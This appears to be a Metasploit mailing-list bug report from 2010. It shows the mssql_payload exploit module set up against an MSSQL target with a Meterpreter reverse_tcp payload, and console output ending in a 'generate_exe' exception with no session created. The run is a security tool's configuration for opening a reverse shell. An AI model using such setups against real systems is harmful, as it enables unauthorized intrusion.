Metasploit mailing list archives

generate_exe error on mssql_payload


From: Robin Wood <robin () digininja org>
Date: Tue, 21 Dec 2010 11:24:23 +0000

Trying to run mssql_payload with the following options but got the
error at the end. It works (well runs, no shells yet) with the other
options.

Robin

Module options:

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   PASSWORD                        no        The password for the
specified username
   RHOST          1.2.3.4       yes       The target address
   RPORT          1234             yes       The target port
   USERNAME       sa               no        The username to authenticate as
   UseCmdStager   false            no        Wait for user input
before returning from exploit
   UsePowerShell  false            no        Use PowerShell for the
payload conversion on Server 2008 and Windows 7
   UseWinDebug    false            no        Use Windows debug for
payload conversion, 2k3 and below only
   VERBOSE        true             no        Enable verbose output


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread,
none, process
   LHOST     1.2.3.3      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 1.2.3.3:4444
[-] Exploit exception: undefined local variable or method
`generate_exe' for #<#<Module:0x105bd5410>::Metasploit3:0x109eff628>
[*] Exploit completed, but no session was created.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: